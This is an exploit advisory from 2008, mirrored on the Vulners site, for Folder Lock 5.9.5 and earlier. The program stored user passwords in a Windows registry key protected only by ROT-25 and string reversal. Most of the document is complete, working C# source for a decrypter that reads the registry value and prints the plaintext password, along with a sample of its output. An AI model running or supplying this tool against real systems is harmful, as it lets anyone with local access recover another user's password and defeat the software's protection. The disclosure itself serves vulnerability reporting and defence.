Vulners
Lucene search
folderlock-disclose.txt
🗓️ 21 Aug 2008 00:00:00Reported by Glafkos CharalambousType 
packetstorm🔗 packetstormsecurity.com👁 17 Views
`/*
* Folder Lock <= 5.9.5 Local Password Information Disclosure
*
* Author(s): Charalambous Glafkos
* George Nicolaou
* Date: June 19, 2008
* Site: http://www.astalavista.com
* Mail: [email protected]
* [email protected]
*
* Synopsis: Folder Lock 5.9.5 and older versions are prone to local information-disclosure vulnerability.
* Successfully exploiting this issue allows attackers to obtain potentially sensitive information that may aid in further attacks.
* The security issue is caused due to the application storing access credentials within the Windows registry key:
* (HKEY_CURRENT_USER\Software\Microsoft\Windows\QualityControl) without proper encryption.
* This can be exploited to disclose the encrypted _pack password of the user which is ROT-25 and reversed.
*
* Sample Output:
*
* ASTALAVISTA the hacking & security community
* Folder Lock <= 5.9.5 Decrypter v2.0
* ---------------------------------
* Encrypted Password: :3<k_^62`4T-
* Decrypted Password: ,S3_15]^j;29
*
*/
using System;
using System.Text;
using System.IO;
using System.Threading;
using Microsoft.Win32;
namespace getRegistryValue
{
class getValue
{
static void Main()
{
getValue details = new getValue();
Console.WriteLine("\nASTALAVISTA the hacking & security community\n\n");
Console.WriteLine("Folder Lock <= 5.9.5 Decrypter v2.0");
Console.WriteLine("---------------------------------");
String strFL = details.getFL();
Console.WriteLine(strFL);
Thread.Sleep(5000);
}
private string getFL()
{
RegistryKey FLKey = Registry.CurrentUser;
FLKey = FLKey.OpenSubKey(@"Software\Microsoft\Windows\QualityControl", false);
String _pack = FLKey.GetValue("_pack").ToString();
String strFL = "Encrypted Password: " + _pack.Replace("~", "") + "\nDecrypted Password: " + Reverse(Rotate(_pack.Replace("~", ""))) + "\n";
return strFL;
}
public string Reverse(string x)
{
char[] charArray = new char[x.Length];
int len = x.Length - 1;
for (int i = 0; i <= len; i++)
charArray[i] = x[len - i];
return new string(charArray);
}
public static string Rotate(string toRotate)
{
char[] charArray = toRotate.ToCharArray();
for (int i = 0; i < charArray.Length; i++)
{
int thisInt = (int)charArray[i];
if (thisInt >= 65 && thisInt <= 91)
{
thisInt += 25;
if (thisInt >= 91)
{
thisInt -= 26;
}
}
if (thisInt >= 92 && thisInt <= 96)
{
thisInt += 25;
if (thisInt >= 96)
{
thisInt -= 26;
}
}
if (thisInt >= 32 && thisInt <= 47)
{
thisInt += 25;
if (thisInt >= 47)
{
thisInt -= 26;
}
}
if (thisInt >= 48 && thisInt <= 57)
{
thisInt += 25;
if (thisInt >= 57)
{
thisInt -= 26;
}
}
if (thisInt >= 58 && thisInt <= 64)
{
thisInt += 25;
if (thisInt >= 64)
{
thisInt -= 26;
}
}
if (thisInt >= 97 && thisInt <= 123)
{
thisInt += 25;
if (thisInt >= 123)
{
thisInt -= 26;
}
}
charArray[i] = (char)thisInt;
}
return new string(charArray);
}
}
}
Best Regards,
Charalambous Glafkos ( nowayout )
__________________________________________
ASTALAVISTA - the hacking & security community
www.astalavista.com
www.astalavista.net
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Aug 2008 00:00Current
7.4High risk
Vulners AI Score7.4